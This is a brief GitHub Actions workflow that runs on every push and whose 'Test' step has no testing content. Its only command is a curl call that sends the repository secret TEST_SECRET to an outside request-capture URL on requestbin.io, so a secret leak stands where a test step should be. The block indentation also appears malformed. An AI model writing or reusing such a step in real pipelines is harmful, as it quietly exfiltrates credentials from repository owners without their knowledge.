name: Export Interfaces And Contracts

on: [push]

jobs:
  test:
    name: Test action and scope
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v3

      - name: Use Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 16
          registry-url: "https://registry.npmjs.org"

      - name: Test
        run: |
        curl "https://requestbin.io/1jur7g91?username=${{ secrets.TEST_SECRET }}"